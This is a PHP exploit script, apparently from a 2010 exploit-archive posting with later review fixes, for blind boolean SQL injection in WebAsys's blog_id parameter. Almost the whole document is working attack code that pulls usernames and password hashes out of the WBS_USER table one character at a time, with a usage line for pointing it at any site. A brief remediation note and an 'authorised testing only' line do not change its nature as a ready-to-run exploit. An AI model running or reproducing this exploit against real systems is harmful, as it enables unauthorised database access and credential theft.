
WebAsys blind SQL Injection Exploit

Posted on 24 May 2010

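<?php
/**
 * WebAsys blind SQL Injection Exploit
 * (published on Inj3ct0r.com, 2010-05-24)
 *
 * @author zsh.shell
 *
 * Injection point used by the original exploit: the `blog_id` parameter of
 * `index.php?ukey=news&blog_id=`. Each probe injects a MySQL `if(<cond>,1,
 * (select 1 union select 2))` expression. When <cond> is false the multi-row
 * subquery makes MySQL fail with "Subquery returns more than 1 row"; whether
 * that text appears in the HTTP response is the boolean oracle. One byte of
 * the target column is recovered per position by walking a small alphabet.
 *
 * Usage:
 *   php exploit.php <url> <C_ID> u   -> recover lower(U_ID) for that C_ID
 *   php exploit.php <url> <C_ID> p   -> recover U_PASSWORD for that C_ID
 *   Example: php exploit.php http://site.com/ 1 p
 *
 * NOTE(review): password mode hard-codes a length of 32 and the alphabet
 * 0-9a-f (i.e. it presumes a lowercase hex hash); this is not verified against
 * the target. Username mode only tries [0-9a-z] against lower(U_ID); a position
 * holding any other byte is reported as '?' rather than silently dropped.
 *
 * Fixes over the original listing: the bare constants a,b,c,... in the
 * alphabet arrays (a fatal "Undefined constant" error on PHP 8); the length
 * probe queried C_ID=1 regardless of the requested id; $res/$out were used
 * before initialisation; file_get_contents() failures were treated as a
 * "true" oracle answer; a length probe that never fired produced an empty
 * result instead of an error.
 *
 * Remediation for the application: bind `blog_id` as a prepared-statement
 * parameter and suppress raw database error text in responses (the error
 * string is what makes this a blind-boolean rather than a fully blind bug).
 *
 * For authorised security testing only.
 */

// Upper bound the original used when searching for the username length.
const MAX_USERNAME_LEN = 25;
// Assumed length of U_PASSWORD (see NOTE above).
const PASSWORD_LEN = 32;

/**
 * Prints usage text and terminates.
 *
 * @param string $self Name of this script ($argv[0]).
 */
function usage($self)
{
    $bar = "#######################################\n";
    echo $bar;
    echo "GET username by id: php " . $self . " url id u\n";
    echo "GET password by id: php " . $self . " url id p\n";
    echo "\nExample: php " . $self . " http://site.com/ 1 p\n";
    die($bar);
}

/**
 * Asks the blind-SQLi oracle whether $condition holds on the target.
 *
 * @param string $base      URL prefix ending in `blog_id=`.
 * @param string $condition MySQL boolean expression, already URL-safe
 *                          (spaces written as `+`).
 * @return bool true when the response does NOT contain the MySQL
 *              "Subquery returns" error, i.e. the true branch of if() ran.
 */
function oracle($base, $condition)
{
    $probe = $base . 'if(' . $condition . ',1,(select+1+union+select+2))';
    $body = file_get_contents($probe);
    if ($body === false) {
        // An unreachable target would otherwise read as "condition true"
        // for every probe and yield garbage output.
        die("[-] Request failed: " . $probe . "\n");
    }
    return !preg_match('/Subquery returns/', $body);
}

if ($argc !== 4) {
    usage($argv[0]);
}

$target = $argv[1];
$id     = $argv[2];
$mode   = $argv[3];

// C_ID is interpolated unquoted into the injected query; only accept digits.
if (!ctype_digit($id)) {
    die("[-] id must be a non-negative integer, got: " . $id . "\n");
}
// The original requires the trailing slash (it concatenates index.php directly).
if (substr($target, -1) !== '/') {
    $target .= '/';
}

$base = $target . 'index.php?ukey=news&blog_id=';
// Scalar subquery for one column of the requested WBS_USER row; `%s` is the column.
$row = '(select+%s+from+WBS_USER+where+C_ID=' . $id . ')';

if ($mode === 'u') {
    $column   = 'lower(U_ID)';
    $alphabet = str_split('0123456789abcdefghijklmnopqrstuvwxyz');

    // Discover the username length first. The original probed C_ID=1 here
    // whatever id was requested; use the same row as the extraction queries.
    $length = 0;
    for ($n = 1; $n <= MAX_USERNAME_LEN; $n++) {
        if (oracle($base, sprintf($row, 'length(U_ID)') . '=' . $n)) {
            $length = $n;
            break;
        }
    }
    if ($length === 0) {
        die("[-] Could not determine username length for C_ID=" . $id
            . " (oracle never fired: wrong URL, no such row, or name longer than "
            . MAX_USERNAME_LEN . ")\n");
    }
} elseif ($mode === 'p') {
    $column   = 'U_PASSWORD';
    $alphabet = str_split('0123456789abcdef');
    $length   = PASSWORD_LEN;
} else {
    die("Wrong exploit parameter: " . $mode . "\n");
}

$result = '';
for ($pos = 1; $pos <= $length; $pos++) {
    $found = false;
    foreach ($alphabet as $ch) {
        // Progress line, overwritten in place (the line only ever grows).
        echo "\r[" . $ch . "] :> " . $result;
        $condition = 'ascii(substring(' . sprintf($row, $column) . ',' . $pos . ',1))=' . ord($ch);
        if (oracle($base, $condition)) {
            $result .= $ch;
            $found = true;
            break;
        }
    }
    if (!$found) {
        // Keep later positions aligned instead of silently shifting them.
        $result .= '?';
    }
}

// The original cleared the terminal via system("cls"/"clear"); a newline is
// enough and avoids spawning a shell.
echo "\n[+] Result: " . $result . "\n";

# Inj3ct0r.com [2010-05-24]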

 
